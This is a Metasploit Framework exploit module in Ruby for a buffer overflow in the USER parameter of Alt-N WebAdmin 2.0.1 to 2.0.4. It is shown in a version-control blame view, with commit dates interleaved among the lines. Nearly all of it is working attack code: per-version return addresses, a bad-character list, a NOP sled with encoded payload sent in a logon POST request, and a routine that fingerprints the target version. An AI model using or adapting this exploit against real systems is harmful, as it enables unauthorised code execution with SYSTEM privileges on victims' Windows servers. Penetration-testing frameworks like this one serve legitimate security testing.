2007-02-18 00:10:39 +00:00
|
|
|
##
|
|
|
|
# $Id:$
|
|
|
|
##
|
|
|
|
|
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
# Framework web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/projects/Framework/
|
|
|
|
##
|
|
|
|
|
|
|
|
|
2005-12-26 14:34:22 +00:00
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
module Msf
|
|
|
|
|
|
|
|
class Exploits::Windows::Http::ALTN_WebAdmin_Overflow < Msf::Exploit::Remote
|
|
|
|
|
2006-01-17 01:11:10 +00:00
|
|
|
include Exploit::Remote::HttpClient
|
2005-12-26 14:34:22 +00:00
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Alt-N WebAdmin USER Buffer Overflow',
|
|
|
|
'Description' => %q{
|
|
|
|
Alt-N WebAdmin is prone to a buffer overflow condition. This
|
|
|
|
is due to insufficient bounds checking on the USER
|
|
|
|
parameter. Successful exploitation could result in code
|
|
|
|
execution with SYSTEM level privileges.
|
|
|
|
},
|
|
|
|
'Author' => [ 'MC' ],
|
2006-06-21 18:38:40 +00:00
|
|
|
'License' => MSF_LICENSE,
|
2005-12-26 14:34:22 +00:00
|
|
|
'Version' => '$Revision$',
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'BID', '8024'],
|
|
|
|
[ 'NSS', '11771'],
|
|
|
|
[ 'MIL', '95'],
|
|
|
|
|
|
|
|
],
|
|
|
|
'Privileged' => false,
|
|
|
|
'DefaultOptions' =>
|
|
|
|
{
|
|
|
|
'EXITFUNC' => 'thread',
|
|
|
|
},
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'Space' => 830,
|
|
|
|
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
|
|
|
|
'StackAdjustment' => -3500,
|
|
|
|
|
|
|
|
},
|
|
|
|
'Platform' => 'win',
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
['WebAdmin 2.0.4 Universal', { 'Ret' => 0x10074d9b }], # 2.0.4 webAdmin.dll
|
|
|
|
['WebAdmin 2.0.3 Universal', { 'Ret' => 0x10074b13 }], # 2.0.3 webAdmin.dll
|
|
|
|
['WebAdmin 2.0.2 Universal', { 'Ret' => 0x10071e3b }], # 2.0.2 webAdmin.dll
|
|
|
|
['WebAdmin 2.0.1 Universal', { 'Ret' => 0x100543c2 }], # 2.0.1 webAdmin.dll
|
|
|
|
],
|
|
|
|
'DisclosureDate' => 'Jun 24 2003'))
|
|
|
|
end
|
|
|
|
|
2006-09-18 00:54:29 +00:00
|
|
|
# Identify the target based on the WebAdmin version number
|
|
|
|
def autofilter
|
2006-12-28 23:42:36 +00:00
|
|
|
res = send_request_raw({
|
|
|
|
'uri' => '/WebAdmin.DLL'
|
|
|
|
}, -1)
|
2006-09-18 00:54:29 +00:00
|
|
|
|
|
|
|
if (res and res.body =~ /WebAdmin.*v(2\..*)$/)
|
|
|
|
case $1
|
|
|
|
when /2\.0\.4/
|
|
|
|
datastore['TARGET'] = 0
|
|
|
|
when /2\.0\.3/
|
|
|
|
datastore['TARGET'] = 1
|
|
|
|
when /2\.0\.2/
|
|
|
|
datastore['TARGET'] = 2
|
|
|
|
when /2\.0\.1/
|
|
|
|
datastore['TARGET'] = 3
|
|
|
|
else
|
|
|
|
return false
|
|
|
|
end
|
|
|
|
|
|
|
|
return true
|
|
|
|
end
|
|
|
|
|
|
|
|
# Not vulnerable
|
|
|
|
return false
|
|
|
|
end
|
|
|
|
|
2005-12-26 14:34:22 +00:00
|
|
|
def exploit
|
|
|
|
|
2006-09-18 00:54:29 +00:00
|
|
|
user_cook = Rex::Text.rand_text_alphanumeric(2)
|
2005-12-26 14:34:22 +00:00
|
|
|
post_data = 'User=' + make_nops(168) + [target.ret].pack('V') + payload.encoded
|
|
|
|
post_data << '&Password=wtf&languageselect=en&Theme=Heavy&Logon=Sign+In'
|
2006-09-18 00:54:29 +00:00
|
|
|
|
2006-12-28 23:42:36 +00:00
|
|
|
print_status("Sending request...")
|
|
|
|
res = send_request_cgi({
|
|
|
|
'uri' => '/WebAdmin.DLL',
|
|
|
|
'query' => 'View=Logon',
|
2005-12-26 14:34:22 +00:00
|
|
|
'method' => 'POST',
|
|
|
|
'content-type' => 'application/x-www-form-urlencoded',
|
2006-09-18 00:54:29 +00:00
|
|
|
'cookie' => "User=#{user_cook}; Lang=en; Theme=standard",
|
2005-12-26 14:34:22 +00:00
|
|
|
'data' => post_data,
|
2006-12-28 23:42:36 +00:00
|
|
|
'headers' =>
|
|
|
|
{
|
|
|
|
'Accept' => 'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png',
|
|
|
|
'Accept-Language' => 'en',
|
|
|
|
'Accept-Charset' => 'iso-8859-1,*,utf-8'
|
|
|
|
}
|
|
|
|
}, 5)
|
2005-12-26 14:34:22 +00:00
|
|
|
|
|
|
|
handler
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|
|
|
|
end
|